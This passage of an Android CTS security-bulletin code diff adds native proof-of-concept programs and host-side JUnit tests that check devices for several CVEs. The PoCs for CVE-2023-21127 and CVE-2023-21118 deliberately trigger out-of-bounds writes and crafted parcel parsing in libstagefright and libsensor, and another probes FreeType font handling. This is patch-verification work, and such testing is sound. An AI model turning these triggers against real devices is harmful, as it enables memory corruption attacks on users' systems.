+    constexpr PixelFormat formats[] = {PIXEL_FORMAT_RGBA_1010102, PIXEL_FORMAT_RGBA_FP16,
+                                       PIXEL_FORMAT_RGBA_4444};
+
+    sp<SurfaceComposerClient> surfaceComposerClient = new SurfaceComposerClient();
+
+    for (PixelFormat format : formats) {
+        sp<SurfaceControl> surfaceControl =
+                new SurfaceControl(surfaceComposerClient, nullptr, val, layerName, width, height,
+                                   format, val, createFlags);
+        sp<SurfaceControl> newSurfaceControl = new SurfaceControl(surfaceControl);
+        FAIL_CHECK(newSurfaceControl->mWidth == width);
+        FAIL_CHECK(newSurfaceControl->mHeight == height);
+        FAIL_CHECK(newSurfaceControl->mCreateFlags == createFlags);
+        if (newSurfaceControl->mFormat == format) {
+            return EXIT_SUCCESS;
+        }
+    }
+
+    return EXIT_VULNERABLE;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2023-21118/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2023-21118/Android.bp
new file mode 100644
index 0000000..e235d48
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2023-21118/Android.bp
@@ -0,0 +1,37 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+    default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+cc_test {
+    name: "CVE-2023-21118",
+    defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+    srcs: [
+        "poc.cpp",
+        ":cts_hostsidetests_securitybulletin_memutils",
+    ],
+    shared_libs: [
+       "libsensor",
+       "libbinder",
+    ],
+    cflags: [
+        "-DCHECK_OVERFLOW",
+        "-DENABLE_SELECTIVE_OVERLOADING",
+    ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2023-21118/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2023-21118/poc.cpp
new file mode 100644
index 0000000..e79dc69
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2023-21118/poc.cpp
@@ -0,0 +1,55 @@
+/**
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <binder/Parcel.h>
+#include <sensor/Sensor.h>
+
+#include <fstream>
+
+#include "../includes/common.h"
+#include "../includes/memutils.h"
+
+using namespace android;
+using namespace std;
+
+char enable_selective_overload = ENABLE_NONE;
+
+void fillParcel(Parcel &reply) {
+  ifstream inputFile("cve_2023_21118.bin", ios::binary);
+  FAIL_CHECK(inputFile.is_open());
+
+  // Compute size of file
+  inputFile.seekg(0, std::ios::end);
+  std::streampos fileSize = inputFile.tellg();
+  inputFile.seekg(0, std::ios::beg);
+
+  // Fill parcel with file data
+  vector<uint8_t> fileData(fileSize);
+  inputFile.read(reinterpret_cast<char *>(fileData.data()), fileSize);
+  inputFile.close();
+  reply.write(fileData.data(), fileSize);
+  reply.setDataPosition(25044 /* Set data position to required position */);
+}
+
+int main() {
+  Parcel reply;
+  Sensor s;
+  fillParcel(reply);
+  enable_selective_overload = ENABLE_ALL;
+  reply.read(s);
+  enable_selective_overload = ENABLE_FREE_CHECK | ENABLE_REALLOC_CHECK;
+  return 0;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2023-21127/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2023-21127/Android.bp
new file mode 100644
index 0000000..99c3515
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2023-21127/Android.bp
@@ -0,0 +1,42 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+    default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+cc_test {
+    name: "CVE-2023-21127",
+    defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+    srcs: [
+        "poc.cpp",
+        ":cts_hostsidetests_securitybulletin_memutils",
+    ],
+    shared_libs: [
+        "libstagefright",
+        "libstagefright_foundation",
+        "libutils",
+    ],
+    header_libs: [
+        "libstagefright_headers",
+    ],
+    cflags: [
+        "-DCHECK_OVERFLOW",
+        "-DENABLE_SELECTIVE_OVERLOADING",
+        "-O0",
+    ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2023-21127/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2023-21127/poc.cpp
new file mode 100644
index 0000000..befb449
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2023-21127/poc.cpp
@@ -0,0 +1,63 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <media/IMediaHTTPService.h>
+#include <media/stagefright/NuMediaExtractor.h>
+#include <media/stagefright/foundation/ABuffer.h>
+#include <stdlib.h>
+#include <vector>
+#include "../includes/common.h"
+#include "../includes/memutils.h"
+
+using namespace android;
+
+char enable_selective_overload = ENABLE_NONE;
+
+constexpr size_t kTrackIndex = 0;
+
+int main(int argc, char **argv) {
+    FAIL_CHECK(argc == 2);
+
+    sp<NuMediaExtractor> extractor = new NuMediaExtractor(NuMediaExtractor::EntryPoint::OTHER);
+    FAIL_CHECK(extractor);
+
+    extractor->setDataSource(nullptr /* httpService */, argv[1]);
+    extractor->selectTrack(kTrackIndex);
+    size_t sampleSize = -1;
+    extractor->getSampleSize(&sampleSize);
+    FAIL_CHECK(sampleSize != -1);
+
+    enable_selective_overload = ENABLE_ALL;
+    std::vector<uint8_t> data(sampleSize);
+    enable_selective_overload = ENABLE_FREE_CHECK | ENABLE_REALLOC_CHECK;
+    FAIL_CHECK(data.size() == sampleSize);
+
+    sp<ABuffer> buffer = new ABuffer(data.data(), sampleSize);
+    FAIL_CHECK(buffer);
+
+    // Setting the offset such that the buffer starts from the next byte after the last byte in the
+    // alignment in order to just write into the write protected region of the allocation.
+    // e.g. for a buffer of size 16 bytes,
+    // if 10 bytes are to be written
+    // then the offset should be 7 to cause an OOB write on the 17th byte.
+    size_t offset = MINIMUM_ALIGNMENT - (sampleSize % MINIMUM_ALIGNMENT) + 1;
+    size_t updatedSize = buffer->capacity() - offset;
+    buffer->setRange(offset, updatedSize);
+
+    // Calling the vulnerable function readSampleData() here causes an OOB write.
+    extractor->readSampleData(buffer);
+    return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2023-21261/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2023-21261/Android.bp
new file mode 100644
index 0000000..88340f4
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2023-21261/Android.bp
@@ -0,0 +1,36 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+    default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+cc_test {
+    name: "CVE-2023-21261",
+    defaults: [
+       "cts_hostsidetests_securitybulletin_defaults",
+    ],
+    srcs: [
+       "poc.cpp",
+    ],
+    shared_libs: [
+       "libft2",
+    ],
+    cflags: [
+       "-DFT2_BUILD_LIBRARY",
+    ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2023-21261/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2023-21261/poc.cpp
new file mode 100644
index 0000000..06c9826
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2023-21261/poc.cpp
@@ -0,0 +1,53 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <ft2build.h>
+#include FT_FREETYPE_H
+#include "../includes/common.h"
+#include <freetype/internal/ftdebug.h>
+
+FT_Face face = nullptr;
+FT_Library library = nullptr;
+
+void exitHandler(void) {
+  if (face) {
+    FT_Done_Face(face);
+  }
+  if (library) {
+    FT_Done_FreeType(library);
+  }
+}
+
+int main(int argc, char **argv) {
+  FAIL_CHECK(argc == 3);
+  atexit(exitHandler);
+  // Initialize FreeType library
+  FT_Error error = FT_Init_FreeType(&library);
+  FAIL_CHECK(!error);
+
+  // Load the font file
+  const int face_index = -1;
+  error = FT_New_Face(library, argv[2], face_index, &face);
+  FAIL_CHECK(!error);
+  if (strcmp(argv[1], "CVE-2022-27406")) {
+    return (face->face_index == face_index) ? EXIT_VULNERABLE : EXIT_SUCCESS;
+  }
+  face->size = nullptr;
+  error = FT_Set_Char_Size(face, 0 /* char_width */, 0 /* char_height */,
+                           0 /* horz_resolution */, 0 /* vert_resolution */);
+  FAIL_CHECK((error == FT_THROW(Invalid_Size_Handle)));
+  return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/includes/memutils.c b/hostsidetests/securitybulletin/securityPatch/includes/memutils.c
index 0fdadb6..afc893c 100644
--- a/hostsidetests/securitybulletin/securityPatch/includes/memutils.c
+++ b/hostsidetests/securitybulletin/securityPatch/includes/memutils.c
@@ -24,6 +24,7 @@
 #include <signal.h>
 #include "memutils.h"
 
+map_struct_t s_free_list[MAX_ENTRIES] = {};
 map_struct_t s_mem_map[MAX_ENTRIES] = {};
 void exit_handler(void) {
     size_t page_size = getpagesize();
diff --git a/hostsidetests/securitybulletin/securityPatch/includes/memutils.h b/hostsidetests/securitybulletin/securityPatch/includes/memutils.h
index 73f798b..251ccc4 100644
--- a/hostsidetests/securitybulletin/securityPatch/includes/memutils.h
+++ b/hostsidetests/securitybulletin/securityPatch/includes/memutils.h
@@ -60,7 +60,7 @@
 static int s_free_write_index = 0;
 static int s_free_read_index = 0;
 static int s_free_list_size = 0;
-map_struct_t s_free_list[MAX_ENTRIES];
+extern map_struct_t s_free_list[MAX_ENTRIES];
 #endif /* CHECK_USE_AFTER_FREE_WITH_WINDOW_SIZE */
 extern map_struct_t s_mem_map[MAX_ENTRIES];
 #if (!(defined CHECK_OVERFLOW) && !(defined CHECK_UNDERFLOW))
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_29374.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_29374.java
index a5e6557..603292a 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_29374.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_29374.java
@@ -17,10 +17,12 @@
 package android.security.cts;
 
 import static org.junit.Assert.*;
+import static org.junit.Assume.assumeTrue;
 
 import android.platform.test.annotations.AsbSecurityTest;
 
 import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.sts.common.util.KernelVersionHost;
 import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
 
 import org.junit.Test;
@@ -36,6 +38,7 @@
     @AsbSecurityTest(cveBugId = 174737879)
     @Test
     public void testPocCVE_2020_29374() throws Exception {
+        assumeTrue(KernelVersionHost.isKernelVersionGreaterThanEqualTo(getDevice(), "5.4.0"));
         AdbUtils.runPocAssertExitStatusNotVulnerable("CVE-2020-29374", getDevice(),60);
     }
 }
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39622.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39622.java
new file mode 100644
index 0000000..3955b56
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39622.java
@@ -0,0 +1,92 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2021_39622 extends NonRootSecurityTestCase {
+    private static final String GBOARD_PKG_NAME = "com.google.android.inputmethod.latin";
+    private static final String RECORD_AUDIO_PERMISSION = "android.permission.RECORD_AUDIO";
+
+    @AsbSecurityTest(cveBugId = 192663648)
+    @Test
+    public void testPocCVE_2021_39622() {
+        ITestDevice iTestDevice = null;
+        boolean wasPermissionGranted = false;
+        try {
+            final String testPkg = "android.security.cts.CVE_2021_39622";
+            final String testClass = testPkg + "." + "DeviceTest";
+            final String testApp = "CVE-2021-39622.apk";
+            final String mIdGboard = "/com.android.inputmethod.latin.LatinIME";
+            iTestDevice = getDevice();
+            assumeTrue(
+                    AdbUtils.runCommandLine("pm list packages", iTestDevice)
+                            .contains(GBOARD_PKG_NAME));
+
+            if (AdbUtils.runCommandLine(
+                            "dumpsys package "
+                                    + GBOARD_PKG_NAME
+                                    + " | grep "
+                                    + RECORD_AUDIO_PERMISSION,
+                            iTestDevice)
+                    .contains("granted=true")) {
+                // android.permission.RECORD_AUDIO has flag USER_SENSITIVE_WHEN_GRANTED
+                AdbUtils.runCommandLine(
+                        "pm revoke " + GBOARD_PKG_NAME + " " + RECORD_AUDIO_PERMISSION,
+                        iTestDevice);
+                wasPermissionGranted = true;
+            }
+
+            if (!AdbUtils.runCommandLine("ime list -s", iTestDevice)
+                    .contains(GBOARD_PKG_NAME + mIdGboard)) {
+                AdbUtils.runCommandLine("ime enable " + GBOARD_PKG_NAME + mIdGboard, iTestDevice);
+            }
+
+            AdbUtils.runCommandLine(
+                    "ime set " + GBOARD_PKG_NAME + RECORD_AUDIO_PERMISSION, iTestDevice);
+            installPackage(testApp);
+            runDeviceTests(testPkg, testClass, "testPocCVE_2021_39622");
+        } catch (Exception e) {
+            assumeNoException(e);
+        } finally {
+            try {
+                // revert RECORD_AUDIO permission changes for Gboard
+                if (wasPermissionGranted) {
+                    AdbUtils.runCommandLine(
+                            "pm grant " + GBOARD_PKG_NAME + " " + RECORD_AUDIO_PERMISSION,
+                            iTestDevice);
+                }
+
+                // Revert input method changes
+                AdbUtils.runCommandLine("ime reset", iTestDevice);
+            } catch (Exception e) {
+                // Ignore exceptions as the test has finished
+            }
+        }
+    }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_20112.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_20112.java
index cc9d347..c12cf33 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_20112.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_20112.java
@@ -1,5 +1,5 @@
 /*
- * Copyright (C) 2022 The Android Open Source Project
+ * Copyright (C) 2023 The Android Open Source Project
  *
  * Licensed under the Apache License, Version 2.0 (the "License");
  * you may not use this file except in compliance with the License.
@@ -17,10 +17,10 @@
 package android.security.cts;
 
 import static org.junit.Assume.assumeNoException;
-import static org.junit.Assume.assumeTrue;
 
 import android.platform.test.annotations.AsbSecurityTest;
 
+import com.android.sts.common.UserUtils;
 import com.android.sts.common.tradefed.testtype.RootSecurityTestCase;
 import com.android.tradefed.device.ITestDevice;
 import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
@@ -30,6 +30,7 @@
 
 @RunWith(DeviceJUnit4ClassRunner.class)
 public class CVE_2022_20112 extends RootSecurityTestCase {
+    private static final String FEATURE_AUTOMOTIVE = "android.hardware.type.automotive";
 
     // b/206987762
     // Vulnerable module : com.android.settings
@@ -38,51 +39,31 @@
     @AsbSecurityTest(cveBugId = 206987762)
     @Test
     public void testPocCVE_2022_20112() {
-        final String testPkg = "android.security.cts.CVE_2022_20112";
-        ITestDevice device = null;
-        int currentUser = -1;
-        int newUser = -1;
         try {
-            device = getDevice();
+            // This setting is not supported on automotive
+            if (isAutomotive()) return;
 
-            // Device wakeup and unlock
-            AdbUtils.runCommandLine("input keyevent KEYCODE_WAKEUP", device);
-            AdbUtils.runCommandLine("wm dismiss-keyguard", device);
+            final ITestDevice device = getDevice();
+            try (AutoCloseable asGuestUser =
+                    new UserUtils.SecondaryUser(device)
+                            .name("CTSUser")
+                            .guest()
+                            .doSwitch()
+                            .withUser()) {
+                // Install PoC application in guest user
+                installPackageAsUser(
+                        "CVE-2022-20112.apk", false /* grantPermission */, device.getCurrentUser());
 
-            // Get current user
-            currentUser = device.getCurrentUser();
-
-            // Create new guest user 'CTSUser' for test
-            newUser = device.createUser("CTSUser", true, false);
-
-            // Start new guest user 'CTSUser'
-            assumeTrue("Unable to create new guest user", device.startUser(newUser, true));
-
-            // Switch to new user 'CTSUser'
-            assumeTrue("Unable to switch to guest user", device.switchUser(newUser));
-
-            // Install PoC application
-            installPackage("CVE-2022-20112.apk");
-
-            runDeviceTests(testPkg, testPkg + ".DeviceTest", "testprivateDnsPreferenceController");
+                final String testPkg = "android.security.cts.CVE_2022_20112";
+                runDeviceTests(
+                        testPkg, testPkg + ".DeviceTest", "testPrivateDnsPreferenceController");
+            }
         } catch (Exception e) {
             assumeNoException(e);
-        } finally {
-            try {
-                if (currentUser != -1) {
-                    // Switch back to previous user
-                    device.switchUser(currentUser);
-                }
-                if (newUser != -1) {
-                    // Stop user 'CTSUser'
-                    device.stopUser(newUser);
-
-                    // Remove user 'CTSUser'
-                    device.removeUser(newUser);
-                }
-            } catch (Exception e) {
-                // Ignore exception here
-            }
         }
     }
+
+    private boolean isAutomotive() throws Exception {
+        return getDevice().hasFeature(FEATURE_AUTOMOTIVE);
+    }
 }
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_20357.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_20357.java
new file mode 100644
index 0000000..e492eb0
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_20357.java
@@ -0,0 +1,52 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static com.android.sts.common.NativePocStatusAsserter.assertNotVulnerableExitCode;
+
+import static org.junit.Assume.assumeNoException;
+
+import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.NativePoc;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2022_20357 extends NonRootSecurityTestCase {
+
+    // b/214999987
+    // Vulnerability Behaviour : EXIT_VULNERABLE
+    // Vulnerable Function     : writeToParcel (As per AOSP code)
+    // Vulnerable Library      : libgui (As per AOSP code)
+    @AsbSecurityTest(cveBugId = 214999987)
+    @Test
+    public void testPocCVE_2022_20357() {
+        try {
+            NativePoc.builder()
+                    .pocName("CVE-2022-20357")
+                    .asserter(assertNotVulnerableExitCode())
+                    .build()
+                    .run(this);
+        } catch (Exception e) {
+            assumeNoException(e);
+        }
+    }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_20944.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_20944.java
new file mode 100644
index 0000000..5d412d4
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_20944.java
@@ -0,0 +1,52 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static org.junit.Assume.assumeNoException;
+
+import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2023_20944 extends NonRootSecurityTestCase {
+
+    // b/244154558
+    // Vulnerable module : services.jar
+    // Vulnerable module : Not applicable
+    // Is Play Managed   : No
+    @AsbSecurityTest(cveBugId = 244154558)
+    @Test
+    public void testPocCVE_2023_20944() {
+        try {
+            final String testPkg = "android.security.cts.CVE_2023_20944_test";
+
+            // Install the test and target apps
+            installPackage("CVE-2023-20944-test.apk");
+            installPackage("CVE-2023-20944-target.apk");
+
+            // Run the test "testCVE_2023_20944"
+            runDeviceTests(testPkg, testPkg + ".DeviceTest", "testCVE_2023_20944");
+        } catch (Exception e) {
+            assumeNoException(e);
+        }
+    }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21107.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21107.java
new file mode 100644
index 0000000..202fb61
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21107.java
@@ -0,0 +1,83 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.device.UserInfo;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.util.Map;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2023_21107 extends NonRootSecurityTestCase {
+    private int mWorkUserId = -1;
+
+    private AutoCloseable withManagedUser() throws Exception {
+        final ITestDevice device = getDevice();
+        String output =
+                AdbUtils.runCommandLine(
+                        "pm create-user --profileOf 0 --managed CVE_2023_21107_TestUser", device);
+        Map<Integer, UserInfo> mapOfUserInfos = device.getUserInfos();
+        for (UserInfo userInfo : mapOfUserInfos.values()) {
+            if (userInfo.userName().equals("CVE_2023_21107_TestUser")) {
+                mWorkUserId = userInfo.userId();
+            }
+        }
+        assumeTrue(mWorkUserId != -1);
+        assumeTrue(device.startUser(mWorkUserId, true /* waitFlag */));
+
+        return new AutoCloseable() {
+            @Override
+            public void close() throws Exception {
+                assumeTrue(device.stopUser(mWorkUserId, true /* waitFlag */, true /* forceFlag */));
+                assumeTrue(device.removeUser(mWorkUserId));
+                AdbUtils.runCommandLine("input keyevent KEYCODE_HOME", device);
+            }
+        };
+    }
+
+    // b/259385017
+    // Vulnerable module : Settings.apk
+    @AsbSecurityTest(cveBugId = 259385017)
+    @Test
+    public void testPocCVE_2023_21107() {
+        try {
+            final String testPkg = "android.security.cts.CVE_2023_21107_test";
+            try (AutoCloseable managedUser = withManagedUser()) {
+                // Install the helper app
+                installPackage("CVE-2023-21107-helper.apk", "--user " + mWorkUserId);
+
+                // Install the test app
+                installPackage("CVE-2023-21107-test.apk");
+
+                // Run the test "testCVE_2023_21107"
+                runDeviceTests(testPkg, testPkg + ".DeviceTest", "testCVE_2023_21107");
+            }
+        } catch (Exception e) {
+            assumeNoException(e);
+        }
+    }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21118.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21118.java
new file mode 100644
index 0000000..b0eb7c6
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21118.java
@@ -0,0 +1,64 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static com.android.sts.common.NativePocCrashAsserter.assertNoCrash;
+
+import static org.junit.Assume.assumeNoException;
+
+import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.NativePoc;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.sts.common.util.TombstoneUtils;
+import com.android.sts.common.util.TombstoneUtils.Config.BacktraceFilterPattern;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2023_21118 extends NonRootSecurityTestCase {
+
+    @AsbSecurityTest(cveBugId = 269014004)
+    @Test
+    public void testPocCVE_2023_21118() {
+        try {
+            String binaryName = "CVE-2023-21118";
+            String inputFile = "cve_2023_21118.bin";
+
+            String[] signals = {TombstoneUtils.Signals.SIGSEGV};
+            TombstoneUtils.Config crashConfig =
+                    new TombstoneUtils.Config()
+                            .setProcessPatterns(binaryName)
+                            .setBacktraceIncludes(
+                                    new BacktraceFilterPattern(
+                                            "libsensor.so", "android::Sensor::unflatten"))
+                            .setSignals(signals);
+
+            // Running the PoC for CVE-2023-21118
+            NativePoc.builder()
+                    .pocName(binaryName)
+                    .resources(inputFile)
+                    .asserter(assertNoCrash(crashConfig))
+                    .build()
+                    .run(this);
+        } catch (Exception e) {
+            assumeNoException(e);
+        }
+    }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21127.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21127.java
new file mode 100644
index 0000000..1564151
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21127.java
@@ -0,0 +1,67 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
